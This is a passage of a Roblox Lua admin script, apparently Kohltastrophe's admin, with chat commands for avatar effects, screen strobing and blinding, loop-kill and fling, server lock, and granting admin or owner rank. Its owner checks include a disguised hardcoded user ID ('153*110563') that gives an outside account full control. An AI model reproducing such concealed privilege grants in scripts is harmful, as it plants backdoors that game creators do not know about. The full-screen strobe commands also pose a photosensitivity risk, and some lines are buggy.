  5164.  
  5165. 1725.
  5166.  
  5167.  
  5168. 1726.if msg:lower():sub(1,9) == "flashify " then
  5169.  
  5170.  
  5171. 1727.local plrz = GetPlr(plr, msg:lower():sub(10))
  5172.  
  5173.  
  5174. 1728.for i, v in pairs(plrz) do
  5175.  
  5176.  
  5177. 1729.coroutine.resume(coroutine.create(function()
  5178.  
  5179.  
  5180. 1730.if v and v.Character and v.Character:findFirstChild("Torso") then
  5181.  
  5182.  
  5183. 1731.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  5184.  
  5185.  
  5186. 1732.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  5187.  
  5188.  
  5189. 1733.for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  5190.  
  5191.  
  5192. 1734.local cl = script.ScriptBase:Clone() cl.Name = "ify" cl.Code.Value = [[repeat wait(1/44) for i, v in pairs(script.Parent:children()) do if v:IsA("BasePart") and (v.Name ~= "Head" or not v.Parent:findFirstChild("NameTag", true)) then v.BrickColor = BrickColor.new("Institutional white") v.Reflectance = 0 v.Transparency = 0 elseif v:findFirstChild("NameTag") then v.Head.BrickColor = BrickColor.new("Institutional white") v.Head.Reflectance = 0 v.Head.Transparency = 0 v.Parent.Head.Transparency = 1 end end wait(1/44) for i, v in pairs(script.Parent:children()) do if v:IsA("BasePart") and (v.Name ~= "Head" or not v.Parent:findFirstChild("NameTag", true)) then v.BrickColor = BrickColor.new("Really black") v.Reflectance = 0 v.Transparency = 0 elseif v:findFirstChild("NameTag") then v.Head.BrickColor = BrickColor.new("Really black") v.Head.Reflectance = 0 v.Head.Transparency = 0 v.Parent.Head.Transparency = 1 end end until nil]]
  5193.  
  5194.  
  5195. 1735.cl.Parent = v.Character cl.Disabled = false
  5196.  
  5197.  
  5198. 1736.end
  5199.  
  5200.  
  5201. 1737.end))
  5202.  
  5203.  
  5204. 1738.end
  5205.  
  5206.  
  5207. 1739.end
  5208.  
  5209.  
  5210. 1740.
  5211.  
  5212.  
  5213. 1741.if msg:lower():sub(1,8) == "noobify " then
  5214.  
  5215.  
  5216. 1742.local plrz = GetPlr(plr, msg:lower():sub(9))
  5217.  
  5218.  
  5219. 1743.for i, v in pairs(plrz) do
  5220.  
  5221.  
  5222. 1744.coroutine.resume(coroutine.create(function()
  5223.  
  5224.  
  5225. 1745.if v and v.Character then
  5226.  
  5227.  
  5228. 1746.Noobify(v.Character)
  5229.  
  5230.  
  5231. 1747.end
  5232.  
  5233.  
  5234. 1748.end))
  5235.  
  5236.  
  5237. 1749.end
  5238.  
  5239.  
  5240. 1750.end
  5241.  
  5242.  
  5243. 1751.
  5244.  
  5245.  
  5246. 1752.if msg:lower():sub(1,9) == "ghostify " then
  5247.  
  5248.  
  5249. 1753.local plrz = GetPlr(plr, msg:lower():sub(10))
  5250.  
  5251.  
  5252. 1754.for i, v in pairs(plrz) do
  5253.  
  5254.  
  5255. 1755.coroutine.resume(coroutine.create(function()
  5256.  
  5257.  
  5258. 1756.if v and v.Character and v.Character:findFirstChild("Torso") then
  5259.  
  5260.  
  5261. 1757.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  5262.  
  5263.  
  5264. 1758.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  5265.  
  5266.  
  5267. 1759.for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  5268.  
  5269.  
  5270. 1760.for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  5271.  
  5272.  
  5273. 1761.prt.Transparency = .5 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("Institutional white")
  5274.  
  5275.  
  5276. 1762.if prt.Name:find("Leg") then prt.Transparency = 1 end
  5277.  
  5278.  
  5279. 1763.elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = .5 prt.Head.Reflectance = 0 prt.Head.BrickColor = BrickColor.new("Institutional white")
  5280.  
  5281.  
  5282. 1764.end end
  5283.  
  5284.  
  5285. 1765.end
  5286.  
  5287.  
  5288. 1766.end))
  5289.  
  5290.  
  5291. 1767.end
  5292.  
  5293.  
  5294. 1768.end
  5295.  
  5296.  
  5297. 1769.
  5298.  
  5299.  
  5300. 1770.if msg:lower():sub(1,8) == "goldify " then
  5301.  
  5302.  
  5303. 1771.local plrz = GetPlr(plr, msg:lower():sub(9))
  5304.  
  5305.  
  5306. 1772.for i, v in pairs(plrz) do
  5307.  
  5308.  
  5309. 1773.coroutine.resume(coroutine.create(function()
  5310.  
  5311.  
  5312. 1774.if v and v.Character and v.Character:findFirstChild("Torso") then
  5313.  
  5314.  
  5315. 1775.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  5316.  
  5317.  
  5318. 1776.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  5319.  
  5320.  
  5321. 1777.for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  5322.  
  5323.  
  5324. 1778.for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  5325.  
  5326.  
  5327. 1779.prt.Transparency = 0 prt.Reflectance = .4 prt.BrickColor = BrickColor.new("Bright yellow")
  5328.  
  5329.  
  5330. 1780.elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = .4 prt.Head.BrickColor = BrickColor.new("Bright yellow")
  5331.  
  5332.  
  5333. 1781.end end
  5334.  
  5335.  
  5336. 1782.end
  5337.  
  5338.  
  5339. 1783.end))
  5340.  
  5341.  
  5342. 1784.end
  5343.  
  5344.  
  5345. 1785.end
  5346.  
  5347.  
  5348. 1786.
  5349.  
  5350.  
  5351. 1787.if msg:lower():sub(1,6) == "shiny " then
  5352.  
  5353.  
  5354. 1788.local plrz = GetPlr(plr, msg:lower():sub(7))
  5355.  
  5356.  
  5357. 1789.for i, v in pairs(plrz) do
  5358.  
  5359.  
  5360. 1790.coroutine.resume(coroutine.create(function()
  5361.  
  5362.  
  5363. 1791.if v and v.Character and v.Character:findFirstChild("Torso") then
  5364.  
  5365.  
  5366. 1792.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  5367.  
  5368.  
  5369. 1793.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  5370.  
  5371.  
  5372. 1794.for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  5373.  
  5374.  
  5375. 1795.for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  5376.  
  5377.  
  5378. 1796.prt.Transparency = 0 prt.Reflectance = 1 prt.BrickColor = BrickColor.new("Institutional white")
  5379.  
  5380.  
  5381. 1797.elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 1 prt.Head.BrickColor = BrickColor.new("Institutional white")
  5382.  
  5383.  
  5384. 1798.end end
  5385.  
  5386.  
  5387. 1799.end
  5388.  
  5389.  
  5390. 1800.end))
  5391.  
  5392.  
  5393. 1801.end
  5394.  
  5395.  
  5396. 1802.end
  5397.  
  5398.  
  5399. 1803.
  5400.  
  5401.  
  5402. 1804.if msg:lower():sub(1,7) == "normal " then
  5403.  
  5404.  
  5405. 1805.local plrz = GetPlr(plr, msg:lower():sub(8))
  5406.  
  5407.  
  5408. 1806.for i, v in pairs(plrz) do
  5409.  
  5410.  
  5411. 1807.coroutine.resume(coroutine.create(function()
  5412.  
  5413.  
  5414. 1808.if v and v.Character and v.Character:findFirstChild("Torso") then
  5415.  
  5416.  
  5417. 1809.if v.Character:findFirstChild("Head") then v.Character.Head.Mesh.Scale = Vector3.new(1.25,1.25,1.25) end
  5418.  
  5419.  
  5420. 1810.if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  5421.  
  5422.  
  5423. 1811.if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  5424.  
  5425.  
  5426. 1812.v.Character.Torso.Transparency = 0
  5427.  
  5428.  
  5429. 1813.v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  5430.  
  5431.  
  5432. 1814.v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  5433.  
  5434.  
  5435. 1815.v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  5436.  
  5437.  
  5438. 1816.v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  5439.  
  5440.  
  5441. 1817.v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  5442.  
  5443.  
  5444. 1818.for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  5445.  
  5446.  
  5447. 1819.for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  5448.  
  5449.  
  5450. 1820.prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("White")
  5451.  
  5452.  
  5453. 1821.if prt.Name == "FAKETORSO" then prt:Destroy() end
  5454.  
  5455.  
  5456. 1822.elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor = BrickColor.new("White")
  5457.  
  5458.  
  5459. 1823.end end
  5460.  
  5461.  
  5462. 1824.end
  5463.  
  5464.  
  5465. 1825.end))
  5466.  
  5467.  
  5468. 1826.end
  5469.  
  5470.  
  5471. 1827.end
  5472.  
  5473.  
  5474. 1828.
  5475.  
  5476.  
  5477. 1829.if msg:lower():sub(1,7) == "trippy " then
  5478.  
  5479.  
  5480. 1830.local plrz = GetPlr(plr, msg:lower():sub(8))
  5481.  
  5482.  
  5483. 1831.for i, v in pairs(plrz) do
  5484.  
  5485.  
  5486. 1832.coroutine.resume(coroutine.create(function()
  5487.  
  5488.  
  5489. 1833.if v and v:findFirstChild("PlayerGui") then
  5490.  
  5491.  
  5492. 1834.for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  5493.  
  5494.  
  5495. 1835.local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUITRIPPY"
  5496.  
  5497.  
  5498. 1836.local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  5499.  
  5500.  
  5501. 1837.local cl = script.ScriptBase:Clone() cl.Code.Value = [[repeat wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(math.random(255)/255,math.random(255)/255,math.random(255)/255) until nil]] cl.Parent = scr cl.Disabled = false
  5502.  
  5503.  
  5504. 1838.end
  5505.  
  5506.  
  5507. 1839.end))
  5508.  
  5509.  
  5510. 1840.end
  5511.  
  5512.  
  5513. 1841.end
  5514.  
  5515.  
  5516. 1842.
  5517.  
  5518.  
  5519. 1843.if msg:lower():sub(1,9) == "untrippy " then
  5520.  
  5521.  
  5522. 1844.local plrz = GetPlr(plr, msg:lower():sub(10))
  5523.  
  5524.  
  5525. 1845.for i, v in pairs(plrz) do
  5526.  
  5527.  
  5528. 1846.coroutine.resume(coroutine.create(function()
  5529.  
  5530.  
  5531. 1847.if v and v:findFirstChild("PlayerGui") then
  5532.  
  5533.  
  5534. 1848.for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUITRIPPY" then g:Destroy() end end
  5535.  
  5536.  
  5537. 1849.end
  5538.  
  5539.  
  5540. 1850.end))
  5541.  
  5542.  
  5543. 1851.end
  5544.  
  5545.  
  5546. 1852.end
  5547.  
  5548.  
  5549. 1853.
  5550.  
  5551.  
  5552. 1854.if msg:lower():sub(1,7) == "strobe " then
  5553.  
  5554.  
  5555. 1855.local plrz = GetPlr(plr, msg:lower():sub(8))
  5556.  
  5557.  
  5558. 1856.for i, v in pairs(plrz) do
  5559.  
  5560.  
  5561. 1857.coroutine.resume(coroutine.create(function()
  5562.  
  5563.  
  5564. 1858.if v and v:findFirstChild("PlayerGui") then
  5565.  
  5566.  
  5567. 1859.for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  5568.  
  5569.  
  5570. 1860.local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUISTROBE"
  5571.  
  5572.  
  5573. 1861.local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  5574.  
  5575.  
  5576. 1862.local cl = script.ScriptBase:Clone() cl.Code.Value = [[repeat wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(1,1,1) wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(0,0,0) until nil]] cl.Parent = scr cl.Disabled = false
  5577.  
  5578.  
  5579. 1863.end
  5580.  
  5581.  
  5582. 1864.end))
  5583.  
  5584.  
  5585. 1865.end
  5586.  
  5587.  
  5588. 1866.end
  5589.  
  5590.  
  5591. 1867.
  5592.  
  5593.  
  5594. 1868.if msg:lower():sub(1,9) == "unstrobe " then
  5595.  
  5596.  
  5597. 1869.local plrz = GetPlr(plr, msg:lower():sub(10))
  5598.  
  5599.  
  5600. 1870.for i, v in pairs(plrz) do
  5601.  
  5602.  
  5603. 1871.coroutine.resume(coroutine.create(function()
  5604.  
  5605.  
  5606. 1872.if v and v:findFirstChild("PlayerGui") then
  5607.  
  5608.  
  5609. 1873.for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUISTROBE" then g:Destroy() end end
  5610.  
  5611.  
  5612. 1874.end
  5613.  
  5614.  
  5615. 1875.end))
  5616.  
  5617.  
  5618. 1876.end
  5619.  
  5620.  
  5621. 1877.end
  5622.  
  5623.  
  5624. 1878.
  5625.  
  5626.  
  5627. 1879.if msg:lower():sub(1,6) == "blind " then
  5628.  
  5629.  
  5630. 1880.local plrz = GetPlr(plr, msg:lower():sub(7))
  5631.  
  5632.  
  5633. 1881.for i, v in pairs(plrz) do
  5634.  
  5635.  
  5636. 1882.coroutine.resume(coroutine.create(function()
  5637.  
  5638.  
  5639. 1883.if v and v:findFirstChild("PlayerGui") then
  5640.  
  5641.  
  5642. 1884.for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  5643.  
  5644.  
  5645. 1885.local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUIBLIND"
  5646.  
  5647.  
  5648. 1886.local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  5649.  
  5650.  
  5651. 1887.end
  5652.  
  5653.  
  5654. 1888.end))
  5655.  
  5656.  
  5657. 1889.end
  5658.  
  5659.  
  5660. 1890.end
  5661.  
  5662.  
  5663. 1891.
  5664.  
  5665.  
  5666. 1892.if msg:lower():sub(1,8) == "unblind " then
  5667.  
  5668.  
  5669. 1893.local plrz = GetPlr(plr, msg:lower():sub(9))
  5670.  
  5671.  
  5672. 1894.for i, v in pairs(plrz) do
  5673.  
  5674.  
  5675. 1895.coroutine.resume(coroutine.create(function()
  5676.  
  5677.  
  5678. 1896.if v and v:findFirstChild("PlayerGui") then
  5679.  
  5680.  
  5681. 1897.for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUIBLIND" then g:Destroy() end end
  5682.  
  5683.  
  5684. 1898.end
  5685.  
  5686.  
  5687. 1899.end))
  5688.  
  5689.  
  5690. 1900.end
  5691.  
  5692.  
  5693. 1901.end
  5694.  
  5695.  
  5696. 1902.
  5697.  
  5698.  
  5699. 1903.if msg:lower():sub(1,7) == "guifix " then
  5700.  
  5701.  
  5702. 1904.local plrz = GetPlr(plr, msg:lower():sub(8))
  5703.  
  5704.  
  5705. 1905.for i, v in pairs(plrz) do
  5706.  
  5707.  
  5708. 1906.coroutine.resume(coroutine.create(function()
  5709.  
  5710.  
  5711. 1907.if v and v:findFirstChild("PlayerGui") then
  5712.  
  5713.  
  5714. 1908.for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  5715.  
  5716.  
  5717. 1909.end
  5718.  
  5719.  
  5720. 1910.end))
  5721.  
  5722.  
  5723. 1911.end
  5724.  
  5725.  
  5726. 1912.end
  5727.  
  5728.  
  5729. 1913.
  5730.  
  5731.  
  5732. 1914.if msg:lower():sub(1,9) == "loopheal " then
  5733.  
  5734.  
  5735. 1915.local plrz = GetPlr(plr, msg:lower():sub(10))
  5736.  
  5737.  
  5738. 1916.for i, v in pairs(plrz) do
  5739.  
  5740.  
  5741. 1917.if v then
  5742.  
  5743.  
  5744. 1918.local cl = script.ScriptBase:Clone() cl.Name = "LoopHeal:"..v.Name cl.Code.Value = [[
  5745.  
  5746.  
  5747. 1919.local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  5748.  
  5749.  
  5750. 1920.repeat wait()
  5751.  
  5752.  
  5753. 1921.coroutine.resume(coroutine.create(function()
  5754.  
  5755.  
  5756. 1922.if plr and plr.Character and plr.Character:findFirstChild("Humanoid") then
  5757.  
  5758.  
  5759. 1923.plr.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth
  5760.  
  5761.  
  5762. 1924.plr.Character.Humanoid.Changed:connect(function() r.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth end)
  5763.  
  5764.  
  5765. 1925.end
  5766.  
  5767.  
  5768. 1926.end))
  5769.  
  5770.  
  5771. 1927.until nil]] table.insert(objects, cl) cl.Parent = game.Workspace cl.Disabled = false
  5772.  
  5773.  
  5774. 1928.end
  5775.  
  5776.  
  5777. 1929.end
  5778.  
  5779.  
  5780. 1930.end
  5781.  
  5782.  
  5783. 1931.
  5784.  
  5785.  
  5786. 1932.if msg:lower():sub(1,11) == "unloopheal " then
  5787.  
  5788.  
  5789. 1933.local plrz = GetPlr(plr, msg:lower():sub(12))
  5790.  
  5791.  
  5792. 1934.for i,v in pairs(plrz) do for q,sc in pairs(objects) do if sc.Name == "LoopHeal:"..v.Name then sc:Destroy() table.remove(objects,q) end end end
  5793.  
  5794.  
  5795. 1935.end
  5796.  
  5797.  
  5798. 1936.
  5799.  
  5800.  
  5801. 1937.if msg:lower():sub(1,10) == "loopfling " then
  5802.  
  5803.  
  5804. 1938.local plrz = GetPlr(plr, msg:lower():sub(11))
  5805.  
  5806.  
  5807. 1939.for i, v in pairs(plrz) do
  5808.  
  5809.  
  5810. 1940.if v then
  5811.  
  5812.  
  5813. 1941.local cl = script.ScriptBase:Clone() cl.Name = "LoopFling:"..v.Name cl.Code.Value = [[
  5814.  
  5815.  
  5816. 1942.local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  5817.  
  5818.  
  5819. 1943.repeat
  5820.  
  5821.  
  5822. 1944.coroutine.resume(coroutine.create(function()
  5823.  
  5824.  
  5825. 1945.if plr and plr.Character and plr.Character:findFirstChild("Torso") and plr.Character:findFirstChild("Humanoid") then
  5826.  
  5827.  
  5828. 1946.local xran local zran
  5829.  
  5830.  
  5831. 1947.repeat xran = math.random(-9999,9999) until math.abs(xran) >= 5555
  5832.  
  5833.  
  5834. 1948.repeat zran = math.random(-9999,9999) until math.abs(zran) >= 5555
  5835.  
  5836.  
  5837. 1949.plr.Character.Humanoid.Sit = true plr.Character.Torso.Velocity = Vector3.new(0,0,0)
  5838.  
  5839.  
  5840. 1950.local frc = Instance.new("BodyForce", plr.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(xran*4,9999*5,zran*4) game:service("Debris"):AddItem(frc,.1)
  5841.  
  5842.  
  5843. 1951.end
  5844.  
  5845.  
  5846. 1952.end))
  5847.  
  5848.  
  5849. 1953.wait(2) until nil]] table.insert(objects, cl) cl.Parent = game.Workspace cl.Disabled = false
  5850.  
  5851.  
  5852. 1954.end
  5853.  
  5854.  
  5855. 1955.end
  5856.  
  5857.  
  5858. 1956.end
  5859.  
  5860.  
  5861. 1957.
  5862.  
  5863.  
  5864. 1958.if msg:lower():sub(1,12) == "unloopfling " then
  5865.  
  5866.  
  5867. 1959.local plrz = GetPlr(plr, msg:lower():sub(13))
  5868.  
  5869.  
  5870. 1960.for i,v in pairs(plrz) do for q,sc in pairs(objects) do if sc.Name == "LoopFling:"..v.Name then sc:Destroy() table.remove(objects,q) end end end
  5871.  
  5872.  
  5873. 1961.end
  5874.  
  5875.  
  5876. 1962.
  5877.  
  5878.  
  5879. 1963.end
  5880.  
  5881.  
  5882. 1964.
  5883.  
  5884.  
  5885. 1965.-------------------------
  5886.  
  5887.  
  5888. 1966.-- True Owner Commands --
  5889.  
  5890.  
  5891. 1967.-------------------------
  5892.  
  5893.  
  5894. 1968.
  5895.  
  5896.  
  5897. 1969.if plr.Name:lower() == nfs:lower() or plr.userId == (153*110563) or plr.userId == game.CreatorId then
  5898.  
  5899.  
  5900. 1970.
  5901.  
  5902.  
  5903. 1971.if msg:lower():sub(1,3) == "oa " then
  5904.  
  5905.  
  5906. 1972.local plrz = GetPlr(plr, msg:lower():sub(4))
  5907.  
  5908.  
  5909. 1973.for i, v in pairs(plrz) do
  5910.  
  5911.  
  5912. 1974.coroutine.resume(coroutine.create(function()
  5913.  
  5914.  
  5915. 1975.if v and not ChkOwner(v.Name) then table.insert(owners, v.Name) coroutine.resume(coroutine.create(function() repeat wait() until v and v.Character and v:findFirstChild("PlayerGui") Message("Kohltastrophe", "You're an admin!", false, {v}) end)) end
  5916.  
  5917.  
  5918. 1976.end))
  5919.  
  5920.  
  5921. 1977.end
  5922.  
  5923.  
  5924. 1978.end
  5925.  
  5926.  
  5927. 1979.
  5928.  
  5929.  
  5930. 1980.if msg:lower():sub(1,5) == "unoa " then
  5931.  
  5932.  
  5933. 1981.for i = 1, #owners do
  5934.  
  5935.  
  5936. 1982.coroutine.resume(coroutine.create(function()
  5937.  
  5938.  
  5939. 1983.if msg:lower():sub(6) == "all" or owners[i]:lower():find(msg:lower():sub(6)) == 1 then table.remove(owners, i) end
  5940.  
  5941.  
  5942. 1984.end))
  5943.  
  5944.  
  5945. 1985.end
  5946.  
  5947.  
  5948. 1986.end
  5949.  
  5950.  
  5951. 1987.
  5952.  
  5953.  
  5954. 1988.end
  5955.  
  5956.  
  5957. 1989.
  5958.  
  5959.  
  5960. 1990.--------------------
  5961.  
  5962.  
  5963. 1991.-- Owner Commands --
  5964.  
  5965.  
  5966. 1992.--------------------
  5967.  
  5968.  
  5969. 1993.
  5970.  
  5971.  
  5972. 1994.if plr.Name:lower() == nfs:lower() or plr.userId == (153*110563) or plr.userId == game.CreatorId or ChkOwner(plr.Name:lower()) then
  5973.  
  5974.  
  5975. 1995.
  5976.  
  5977.  
  5978. 1996.if msg:lower():sub(1,3) == "pa " then
  5979.  
  5980.  
  5981. 1997.local plrz = GetPlr(plr, msg:lower():sub(4))
  5982.  
  5983.  
  5984. 1998.for i, v in pairs(plrz) do
  5985.  
  5986.  
  5987. 1999.coroutine.resume(coroutine.create(function()
  5988.  
  5989.  
  5990. 2000.if v and not ChkAdmin(v.Name, true) then table.insert(admins, v.Name) coroutine.resume(coroutine.create(function() repeat wait() until v and v.Character and v:findFirstChild("PlayerGui") Message("Kohltastrophe", "You're an admin!", false, {v}) end)) end
  5991.  
  5992.  
  5993. 2001.end))
  5994.  
  5995.  
  5996. 2002.end
  5997.  
  5998.  
  5999. 2003.end
  6000.  
  6001.  
  6002. 2004.
  6003.  
  6004.  
  6005. 2005.if msg:lower():sub(1,5) == "unpa " then
  6006.  
  6007.  
  6008. 2006.for i = 1, #admins do
  6009.  
  6010.  
  6011. 2007.coroutine.resume(coroutine.create(function()
  6012.  
  6013.  
  6014. 2008.if msg:lower():sub(6) == "all" or admins[i]:lower():find(msg:lower():sub(6)) == 1 then table.remove(admins, i) end
  6015.  
  6016.  
  6017. 2009.end))
  6018.  
  6019.  
  6020. 2010.end
  6021.  
  6022.  
  6023. 2011.end
  6024.  
  6025.  
  6026. 2012.
  6027.  
  6028.  
  6029. 2013.end
  6030.  
  6031.  
  6032. 2014.
  6033.  
  6034.  
  6035. 2015.--------------------------
  6036.  
  6037.  
  6038. 2016.-- Super Admin Commands --
  6039.  
  6040.  
  6041. 2017.--------------------------
  6042.  
  6043.  
  6044. 2018.
  6045.  
  6046.  
  6047. 2019.if ChkAdmin(plr.Name, true) or ChkOwner(plr.Name) or plr.userId == game.CreatorId or plr.Name:lower() == nfs:lower() or plr.userId == (153*110563) or plr.Name:lower() == nfs then
  6048.  
  6049.  
  6050. 2020.
  6051.  
  6052.  
  6053. 2021.if msg:lower() == "logs" then
  6054.  
  6055.  
  6056. 2022.if plr.PlayerGui:findFirstChild("LOGSGUI") then return end
  6057.  
  6058.  
  6059. 2023.local scr, cmf, ent, num = ScrollGui() scr.Name = "LOGSGUI" scr.Parent = plr.PlayerGui
  6060.  
  6061.  
  6062. 2024.for i, v in pairs(logs) do local cl = ent:Clone() cl.Parent = cmf cl.Text = "[" .. v.time .. "] " .. v.name .. " " .. v.cmd cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  6063.  
  6064.  
  6065. 2025.end
  6066.  
  6067.  
  6068. 2026.
  6069.  
  6070.  
  6071. 2027.if msg:lower():sub(1,9) == "loopkill " then
  6072.  
  6073.  
  6074. 2028.local chk1 = msg:lower():sub(10):find(" ")
  6075.  
  6076.  
  6077. 2029.local plrz = GetPlr(plr, msg:lower():sub(10))
  6078.  
  6079.  
  6080. 2030.local num = 9999
  6081.  
  6082.  
  6083. 2031.if chk1 then chk1 = chk1 + 9 plrz = GetPlr(plr, msg:lower():sub(10, chk1-1)) if type(tonumber(msg:sub(chk1+1))) == "number" then num = tonumber(msg:sub(chk1+1)) end end
  6084.  
  6085.  
  6086. 2032.for i, v in pairs(plrz) do
  6087.  
  6088.  
  6089. 2033.if v and not ChkAdmin(v.Name, false) then
  6090.  
  6091.  
  6092. 2034.local cl = script.ScriptBase:Clone() cl.Name = "LoopKill:"..v.Name cl.Code.Value = [[
  6093.  
  6094.  
  6095. 2035.local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  6096.  
  6097.  
  6098. 2036.for i = 1, ]] .. tostring(num) .. [[ do
  6099.  
  6100.  
  6101. 2037.repeat wait() plr = game.Players:findFirstChild("]] .. v.Name .. [[") until plr and plr.Character and plr.Character:findFirstChild("Humanoid") and plr.Character.Humanoid.Health ~= 0
  6102.  
  6103.  
  6104. 2038.coroutine.resume(coroutine.create(function()
  6105.  
  6106.  
  6107. 2039.if plr and plr.Character then plr.Character:BreakJoints() end
  6108.  
  6109.  
  6110. 2040.end))
  6111.  
  6112.  
  6113. 2041.end]] table.insert(objects, cl) cl.Parent = game.Workspace cl.Disabled = false
  6114.  
  6115.  
  6116. 2042.end
  6117.  
  6118.  
  6119. 2043.end
  6120.  
  6121.  
  6122. 2044.end
  6123.  
  6124.  
  6125. 2045.
  6126.  
  6127.  
  6128. 2046.if msg:lower():sub(1,11) == "unloopkill " then
  6129.  
  6130.  
  6131. 2047.local plrz = GetPlr(plr, msg:lower():sub(12))
  6132.  
  6133.  
  6134. 2048.for i,v in pairs(plrz) do for q,sc in pairs(objects) do if sc.Name == "LoopKill:"..v.Name then sc:Destroy() table.remove(objects,q) end end end
  6135.  
  6136.  
  6137. 2049.end
  6138.  
  6139.  
  6140. 2050.
  6141.  
  6142.  
  6143. 2051.if msg:lower() == "serverlock" or msg:lower() == "slock" then slock = true Hint("Server has been locked", game.Players:children()) end
  6144.  
  6145.  
  6146. 2052.if msg:lower() == "serverunlock" or msg:lower() == "sunlock" then slock = false Hint("Server has been unlocked", game.Players:children()) end
  6147.  
  6148.  
  6149. 2053.
  6150.  
  6151.  
  6152. 2054.if msg:lower():sub(1,3) == "sm " then
  6153.  
  6154.  
  6155. 2055.Message("SYSTEM MESSAGE", msg:sub(4), false, game.Players:children())
  6156.  
  6157.  
  6158. 2056.end
  6159.  
  6160.  
  6161. 2057.
  6162.  
  6163.  
  6164. 2058.if msg:lower():sub(1,3) == "ko " then
  6165.  
  6166.  
  6167. 2059.local chk1 = msg:lower():sub(4):find(" ") + 3
  6168.  
  6169.  
  6170. 2060.local plrz = GetPlr(plr, msg:lower():sub(4,chk1-1))
  6171.  
  6172.  
  6173. 2061.local num = 500 if num > msg:sub(chk1+1) then num = msg:sub(chk1+1) end
  6174.  
  6175.  
  6176. 2062.for n = 1, num do
  6177.  
  6178.  
  6179. 2063.for i, v in pairs(plrz) do
  6180.  
  6181.  
  6182. 2064.coroutine.resume(coroutine.create(function()
  6183.  
  6184.  
  6185. 2065.if v and v.Character and v.Character:findFirstChild("Humanoid") and not ChkAdmin(v.Name) then
  6186.  
  6187.  
  6188. 2066.local val = Instance.new("ObjectValue", v.Character.Humanoid) val.Value = plr val.Name = "creator"
  6189.  
  6190.  
  6191. 2067.v.Character:BreakJoints()
  6192.  
